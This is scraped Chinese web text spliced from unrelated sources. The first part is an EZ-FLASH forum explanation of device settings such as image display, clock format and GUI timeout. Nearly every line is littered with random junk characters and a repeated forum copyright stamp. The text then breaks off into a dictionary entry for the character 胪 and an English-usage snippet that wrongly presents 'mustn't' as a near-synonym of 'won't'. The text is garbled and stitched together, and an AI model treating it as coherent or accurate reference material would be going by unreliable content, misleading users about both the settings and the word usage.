©EZ-FLASH论坛 -- EZ-FLASH论坛 ~|F{H
9.2 GOPSkip=0k
不明白。;
©EZ-FLASH论坛 -- EZ-FLASH论坛 tHl~
9.3 AdaptiveDelayControl=0cP
不明白。Df#
©EZ-FLASH论坛 -- EZ-FLASH论坛 ]Q
10.1 GUITimeOutSec=2J$"
浏览图片时,图形界面消去延迟时间,0为总不显示,1--N为指定消失时间,单位为秒。+
©EZ-FLASH论坛 -- EZ-FLASH论坛 M7B-
10.2 ImageMode=0Kj`O\
图片显示设置,0为仅下屏显示,1为上下屏同时显示。2u}%
©EZ-FLASH论坛 -- EZ-FLASH论坛 '|ej
10.3 DrawFileInfo=1o|c
显示图片信息设置,0为隐藏,1为显示。:dwsTs
©EZ-FLASH论坛 -- EZ-FLASH论坛 xM
10.4 VerticalPadding=96xBb)4
上下屏同时浏览时中间空白区域设置,单位为像素。bRJzl
©EZ-FLASH论坛 -- EZ-FLASH论坛 $1
10.x Interpolation=1hO`?5
不明白。Vo
©EZ-FLASH论坛 -- EZ-FLASH论坛 kgs`
11.1 Enabled=1av.!
时钟设置,0为隐藏,1为显示。D:
©EZ-FLASH论坛 -- EZ-FLASH论坛 uUC`
11.2 RTC24Hour=1]j*G
时间格式,0为12小时制,1为24小时制。1,MG
©EZ-FLASH论坛 -- EZ-FLASH论坛 F|`
11.3 formatDate=YYYY/MM/DD%"d*
日期格式,可以自行更改显示顺序。(
基本信息:
部首:月,四角码:71207,仓颉:bys
86五笔:ehnt,98五笔:ehnt,郑码:QIXM
统一码:80EA,总笔画数:9
基本解释:
1、传语,陈述:胪布(宣布,陈述)。胪言(传言)。胪句(上传语告下为“胪”,下传语告上为“句”)。胪心(陈述心情)。胪唱(科举时代进士殿试后,按甲第唱名传呼召见。亦称“传胪”)。
2、陈列:胪列。
3、〔鸿胪〕古代官名。
4、腹前的肉。
扩展资料:
相关组词:
1、胪列[lú liè]
列举:胪列三种方案,以供采择。
2、胪陈[lú chén]
一一陈述(多用于旧式公文或书信):谨将经过实情,胪陈如左。
3、胪古[lú gǔ]
犹言考古。
4、逆胪[nì lú]
中医病名。
5、胪欢[lú huān]
亦作“胪驩”。歌呼欢腾。
won't怎么读
won't,读音:英[wəʊnt],美[wəʊnt]。
won't是will的否定形式will not的缩写,意思是将不会做某事。它表示的是一般将来时,也就是以现在为出发点,将来有可能发生的事情。比如说:
HIS parents won’t let him come.他父母不会让他来的。
so you won’t go tomorrow eh?啊,那么你明天不去了?
won't的近义词
mustn't的意思是“不可以“不允许”。
用法:
1、情态动词,后接原形动词。如:
You mustn't be late for school.你上学必须不能迟到。
2、作May开头的问句的否定回答。如:
May I watch Tv now?现在我可以看电视吗?
No,you mustn't.不,你不可以。